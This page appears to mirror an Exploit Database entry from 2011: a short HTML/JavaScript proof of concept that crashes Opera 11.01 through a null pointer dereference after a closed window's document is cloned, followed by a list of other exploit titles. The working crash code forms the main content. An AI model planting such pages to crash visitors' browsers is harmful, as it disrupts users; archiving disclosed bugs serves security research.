Opera 11.01 – NULL PTR Dereference

Exploit Database
95 阅读

作者： echo

日期： 2011-03-15
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/16979/

<html>
<head>
<title>Opera 11.01 Null Ptr Derefer</title>
</head>
<body>
 <script type="text/JavaScript" language="JavaScript">
 
/*
* [+]. Title : Opera 11.01 Null Pointer Derefernce 
* [+]. Date : 15.03.2011 05:18
* [+]. Author: echo
* [+]. Version: 11.01
* [+]. Software link: http://www.opera.com/download/
* [+]. Tested on : Win32 xp home sp 2
* [+]. CVE : NULL
* ---------------------------------------
* 675B5646MOV ECX,DWORD PTR DS:[EDI+8] 
* DS:[00000008]=???
* ECX=00000000 
* EDI=00000000
*/
var iWin= window.open();
var iShit = iWin.document.createElement("ANY");
iWin.document.body.appendChild(iShit);
iWin.close();
iWin.document.cloneNode("HiH");

 </script>
</body>
</html>

last Exploits
Opera 11.01 – NULL PTR Dereference的更多信息

NetworkSleuth 3.0.0.0 – ‘Key’ Denial of Service (PoC)：
libquicktime 1.2.4 – Denial of Service：
MHonArc 2.6.16 – Tag Nesting Remote Denial of Service：
Microsoft Windows – ‘IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS’ volmgr Pool Memory Disclosure：
Adobe Photoshop CS6 – ‘.png’ Parsing Heap Overflow：
Extreme Networks Aerohive HiveOS 11.0 – Remote Denial of Service (PoC)：
fusermount – user_allow_other Restriction Bypass and SELinux Label Control：
Advanced Host Monitor 11.90 Beta – ‘Registration number’ Denial of Service (PoC)：